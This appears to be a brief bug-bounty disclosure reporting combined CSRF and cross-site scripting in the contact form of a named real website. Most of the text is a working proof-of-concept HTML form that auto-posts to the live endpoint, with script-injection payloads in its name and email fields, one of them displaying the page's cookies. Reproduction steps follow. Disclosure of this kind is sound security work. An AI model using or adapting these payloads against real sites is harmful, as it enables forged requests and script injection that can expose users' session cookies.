XSS and CSRF in Zomato Contact form

URL affected:-- https://www.zomato.com/contact CSRF Payload:-- <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="https://www.zomato.com/contact" method="POST"> <input type="hidden" name="csrf&#95;token" value="fa53b2d4ea3ae0113d903ed5b0200fcb" /> <input type="hidden" name="name" value="&lt;script&gt;alert&#40;1&#41;&lt;&#47;script&gt;" /> <input type="hidden" name="email" value="vibhuti123i&quot;&gt;&lt;script&#32;&gt;alert&#40;document&#46;cookie&#41;&lt;&#47;script&gt;" /> <input type="hidden" name="phone" value="" /> <input type="hidden" name="message" value="retrryrty" /> <input type="hidden" name="submit" value="Submit" /> <input type="submit" value="Submit request" /> </form> </body> </html> Step to Reproduce:---- 1)I have tested it after Login and without Login .This CSRF worked with executing XSS due to CSRF in Contact form.It is tested in Latest Firefox browser. 2)Just run the above payload and you will find below image XSS executed poping Up cookies.